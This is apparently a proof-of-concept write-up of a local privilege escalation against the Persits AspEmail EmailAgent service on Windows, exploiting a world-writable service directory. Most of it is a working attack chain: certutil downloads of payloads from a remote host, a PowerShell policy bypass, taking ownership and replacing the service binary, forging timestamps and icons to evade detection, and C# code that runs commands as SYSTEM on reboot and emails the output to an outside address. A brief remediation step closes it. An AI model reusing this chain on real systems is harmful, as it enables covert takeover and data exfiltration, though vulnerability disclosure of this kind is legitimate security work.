[+] C:\PenTest>whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege NameDescription State
============================= ========================================= ========
SeIncreaseQuotaPrivilegeAdjust memory quotas for a processDisabled
SeChangeNotifyPrivilege Bypass traverse checkingEnabled
SeImpersonatePrivilegeImpersonate a client after authentication Enabled
SeIncreaseWorkingSetPrivilege Increase a process working setDisabled
* First, we will test whether the AspEmail service is active.
* First of all, we perform a query to list the processes running in the system with normal user rights and test whether the process of the relevant service is running:
[+] C:\PenTest>tasklist /svc | findstr EmailAgent.exe
EmailAgent.exe4400 Persits Software EmailAgent
or
[+] C:\PenTest>tasklist /svc | findstr EmailAgent64.exe
EmailAgent64.exe4400 Persits Software EmailAgent
* We have detected that the process of the "Persits Software Email Agent" Service is state "RUNNING".
* Now we know that AspEmail service is active.
* We will need these:
[+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/EmailAgent.exe "C:\Program Files (x86)\Persits Software\AspEmail\BIN\EmailAgentPrivESC.exe" <<<=== MyExploit
[+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/nircmd.exe "C:\Program Files (x86)\Persits Software\AspEmail\BIN\nircmd.exe"
[+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/Mail.exe "C:\Windows\Temp\Mail.exe"
[+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/Run.exe "C:\Windows\Temp\Run.bat"
[+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/PrivescCheck.ps1 "C:\PenTest\PrivescCheck.ps1"
[+] C:\PenTest>powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck"
Name: Persits Software EmailAgent
ImagePath : "C:\Program Files (x86)\Persits Software\AspEmail\BIN\Email
Agent.exe" /run
User: LocalSystem
ModifiablePath: C:\Program Files (x86)\Persits Software\AspEmail\BIN
IdentityReference : Everyone
Permissions : WriteOwner, Delete, WriteAttributes, Synchronize, ReadControl, ReadData/ListDirectory,
AppendData/AddSubdirectory, WriteExtendedAttributes, WriteDAC, ReadAttributes, WriteData/AddFile,
ReadExtendedAttributes, DeleteChild, Execute/Traverse
Status: Unknown
UserCanStart: False
UserCanStop : False
[+] C:\PenTest>del PrivescCheck.ps1
* We detected "Persits Software EmailAgent" Service "Binary Permission Vulnerability" in our checks.
[+] C:\PenTest>ICACLS "C:\Program Files (x86)\Persits Software\AspEmail"
Successfully processed 0 files; Failed processing 1 files
C:\Program Files (x86)\Persits Software\AspEmail: Access is denied.
* We do not have permission to access subdirectories.
[+] C:\PenTest>ICACLS "C:\Program Files (x86)\Persits Software\AspEmail\BIN"
C:\Program Files (x86)\Persits Software\AspEmail\BIN Everyone:(OI)(CI)(F)
DeepSecLab\psacln:(I)(OI)(CI)(N)
DeepSecLab\psaadm:(I)(OI)(CI)(N)
DeepSecLab\psaadm_users:(I)(OI)(CI)(N)
BUILTIN\Administrators:(I)(F)
CREATOR OWNER:(I)(OI)(CI)(IO)(F)
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(OI)(CI)(RX)
NT SERVICE\TrustedInstaller:(I)(CI)(F)
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
BUILTIN\Users:(I)(OI)(CI)(RX)
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(OI)(CI)(RX)
* Unlike other directories, we have full privileges in the "BIN" directory of the service.
* This is chmod 0777 - rwxrwxrwx in linux language.
[+] C:\PenTest>WMIC Path Win32_LogicalFileSecuritySetting WHERE Path="C:\\Program Files (x86)\\Persits Software\\AspEmail\\Bin\\EmailAgent.exe" ASSOC /RESULTROLE:Owner /ASSOCCLASS:Win32_LogicalFileOwner /RESULTCLASS:Win32_SID
__PATH
\\DeepSecLab\root\cimv2:Win32_LogicalFileSecuritySetting.Path="C:\\Program Files (x86)\\Persits Software\\AspEmail\\Bin\\EmailAgent.exe"
\\DeepSecLab\root\cimv2:Win32_SID.SID="S-1-5-32-544"
root\cimv2DeepSecLab{}5Win32_SID.SID="S-1-5-32-544"Win32_SIDWin32_SID2Administrators{1, 2, 0, 0, 0, 0, 0, 5, 32, 0, 0, 0, 32, 2, 0, 0}BUILTINS-1-5-32-54416
[EmailAgent.exe] ===>>> Owner: BUILTIN\Administrators
* We understood "EmailAgent.exe" processor was installed by the Administrator and the owner is the Administrator user.
* Now we will take ownership of this directory as we will execute our operations under the "BIN" directory.
[+] C:\PenTest>whoami
DeepSecLab\Hacker
[+] C:\PenTest>takeown /f "C:\Program Files (x86)\Persits Software\AspEmail\BIN"
SUCCESS: The file (or folder): "C:\Program Files (x86)\Persits Software\AspEmail\BIN" now owned by user "DeepSecLab\Hacker".
[+] C:\PenTest>ICACLS "C:\Program Files (x86)\Persits Software\AspEmail\BIN" /Grant DeepSecLab\Hacker:F
processed file: C:\Program Files (x86)\Persits Software\AspEmail\BIN
Successfully processed 1 files; Failed processing 0 files
* Ok. All commands resulted successfully. We now have full privileges for this directory.
* Now we will modify the EmailAgent file and inject a self-written malware.
* We will be careful not to damage any files while doing this so that all transactions can be easily undone.
[+] C:\Program Files (x86)\Persits Software\AspEmail\BIN>ren EmailAgent.exe Null.EmailAgent.exe
[+] C:\Program Files (x86)\Persits Software\AspEmail\BIN>ren EmailAgentPrivESC.exe EmailAgent.exe
[+]C:\Program Files (x86)\Persits Software\AspEmail\Bin>dir
Volume in drive C has no label.
Volume Serial Number is 0C8A-5291
Directory of C:\Program Files (x86)\Persits Software\AspEmail\Bin
14.04.202316:47<DIR>.
14.04.202316:47<DIR>..
01.03.200415:55 143.360 AspEmail.dll
25.02.200416:23 188.416 AspUpload.dll
13.04.202322:0012.288 EmailAgent.exe <<<=== ReNamed for EmailAgentPrivESC.exe
24.09.200309:22 139.264 EmailAgentCfg.cpl
24.09.200309:2594.208 EmailLogger.dll
24.09.200309:21 167.936 Null.EmailAgent.exe
6 File(s)745.472 bytes
2 Dir(s)165.936.717.824 bytes free
* We are now making the settings on Last Modified Date, Creation Date and Last Accessed Date.
[+] C:\Program Files (x86)\Persits Software\AspEmail\BIN>nircmd.exe setfiletime "EmailAgent.exe" "24.03.2007 09:21:30" "24.03.2007 09:21:30" "23.05.2017 06:42:28"
[+] C:\Program Files (x86)\Persits Software\AspEmail\BIN>del nircmd.exe
* And next is we are making extracting the real EmailAgent.exe file icon and changing the icon for exploit. This way, we will make it harder to detect.
* I used the Resource Tuner Console tool.
>>> http://www.restuner.com/tour-resource-tuner-console.htm
* This can be done easily with the Resource Tuner tool.
>>> http://www.resource-editor.com/how-to-change-icons-in-exe.html
>>> http://www.restuner.com/download.htm
[+] C:\Program Files (x86)\Persits Software\AspEmail\Bin>dir
Volume in drive C has no label.
Volume Serial Number is 0C8A-5291
Directory of C:\Program Files (x86)\Persits Software\AspEmail\Bin
14.04.202316:47<DIR>.
14.04.202316:47<DIR>..
01.03.200415:55 143.360 AspEmail.dll
25.02.200416:23 188.416 AspUpload.dll
24.09.200309:2112.288 EmailAgent.exe
24.09.200309:22 139.264 EmailAgentCfg.cpl
24.09.200309:2594.208 EmailLogger.dll
24.09.200309:21 167.936 Null.EmailAgent.exe
6 File(s)745.472 bytes
2 Dir(s)165.936.717.824 bytes free
[24.09.200309:21]12.288 EmailAgent.exe
[24.09.200309:21] 167.936 Null.EmailAgent.exe
* And time manipulation is over. They look like they were uploaded at the same time long ago.
* Now we check for my malware ownership.
[+] C:\PenTest>WMIC Path Win32_LogicalFileSecuritySetting WHERE Path="C:\\Program Files (x86)\\Persits Software\\AspEmail\\Bin\\EmailAgent.exe" ASSOC /RESULTROLE:Owner /ASSOCCLASS:Win32_LogicalFileOwner /RESULTCLASS:Win32_SID
__PATH
\\DeepSecLab\root\cimv2:Win32_LogicalFileSecuritySetting.Path="C:\\Program Files (x86)\\Persits Software\\AspEmail\\Bin\\EmailAgent.exe"
\\DeepSecLab\root\cimv2:Win32_SID.SID="S-1-5-21-3674093405-176013069-2091862131-1511" root\cimv2DeepSecLab{}5Win32_SID.SID="S-1-5-21-3674093405-176013069-2091862131-1511"Win32_SIDWin32_SID2Hacker{1, 5, 0, 0, 0, 0, 0, 5, 21, 0, 0, 0, 93, 55, 254, 218, 13, 191, 125, 10, 115, 72, 175, 124, 231, 5, 0, 0}DeepSecLabS-1-5-21-3674093405-176013069-2091862131-151128
[+] C:\PenTest>WMIC UserAccount WHERE sid="S-1-5-21-3674093405-176013069-2091862131-1511" GET Name
Name
DeepSecLab\Hacker
EmailAgent.exe Owner: DeepSecLab\Hacker
* We program this malware in such a way that when the server is reboot(when the services are restarted),
* It will be triggered and execute the codes we want,
* And then send a printout of all this to the email address we specified.
using System;
using System.Linq;
using System.Text;
using System.Diagnostics;
using System.IO;
using System.Collections;
Namespace CliToolSpace
{
class _Main
{
static void Main(string[] args)
{
Cli commandLine = new Cli();
commandLine.FileToCli(@"C:\Windows\Temp\Mail.exe & C:\Windows\Temp\Run.bat");
commandLine.Execute();
commandLine.ToFile(@"C:\Windows\Temp\");
}
}
}
using System;
using System.Net.Mail;
using System.Net;
SmtpClient SmtpServer = new SmtpClient("smtp.deepseclab.com");
var mail = new MailMessage();
mail.From = new MailAddress("mail@deepseclab.com");
mail.To.Add("mail@hacker.com");
mail.Subject = "Trigger Successful!";
mail.IsBodyHtml = true;
string htmlBody;
htmlBody = "<strong>This server has been rebooted.</strong>";
mail.Body = htmlBody;
Attachment attachment;
attachment = new Attachment(@"C:\Windows\Temp\Export.txt");
mail.Attachments.Add(attachment);
SmtpServer.Port = 587;
SmtpServer.UseDefaultCredentials = false;
SmtpServer.Credentials = new System.Net.NetworkCredential("mail@deepseclab.com","p@ssw0rd123");
SmtpServer.EnableSsl = true;
SmtpServer.Timeout = int.MaxValue;
SmtpServer.Send(mail);
whoami > C:\Windows\Temp\Export.txt
cd C:\Program Files (x86)\Persits Software\AspEmail\Bin
del EmailAgent.exe & ren Null.EmailAgent.exe EmailAgent.exe
cd c:\Windows\Tasks
del Run.bat & del Mail.exe
[+]Trigger Successful![+]
[+] C:\PenTest>systeminfo | findstr "Boot Time"
System Boot Time:13.04.2022, 07:46:06
NT AUTHORITY\SYSTEM
[+] C:\Administrator>sc qc "Persits Software EmailAgent"
[SC] QueryServiceConfig SUCCESS
SERVICE_Name: Persits Software EmailAgent
TYPE : 10WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL: 1 NORMAL
BINARY_PATH_Name : "C:\Program Files (x86)\Persits Software\AspEmail\BIN\EmailAgent.exe" /run
LOAD_ORDER_GROUP :
TAG: 0
DISPLAY_Name : Persits Software EmailAgent
DEPENDENCIES : rpcss
SERVICE_START_Name : LocalSystem
[+] C:\Administrator>sc sdshow "Persits Software EmailAgent"
D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
[+] C:\Administrator>accesschk64.exe -wuvc "Persits Software EmailAgent" -accepteula
Accesschk v6.15 - Reports effective permissions for securable objects
Copyright (C) 2006-2022 Mark Russinovich
Sysinternals - www.sysinternals.com
Persits Software EmailAgent
Medium Mandatory Level (Default) [No-Write-Up]
RW NT AUTHORITY\SYSTEM
SERVICE_ALL_ACCESS
RW BUILTIN\Administrators
SERVICE_ALL_ACCESS
[+] C:\Administrator>ICACLS "C:\Program Files (x86)\Persits Software" /T /Q /C /RESET
[+] C:\PenTest>ICACLS "C:\Program Files (x86)\Persits Software\AspEmail\BIN"
Successfully processed 0 files; Failed processing 1 files
C:\Program Files (x86)\Persits Software\AspEmail\Bin: Access is denied.
DONE!
[+] C:\Administrator>sc stop "Persits Software EmailAgent"
[+] PS C:\Administrator> Start-Service -Name "Persits Software EmailAgent"
* These commands are optional. Used to stop the "Persits Software EmailAgent" service. We fixed the vulnerability and I don't think it's necessary anymore.
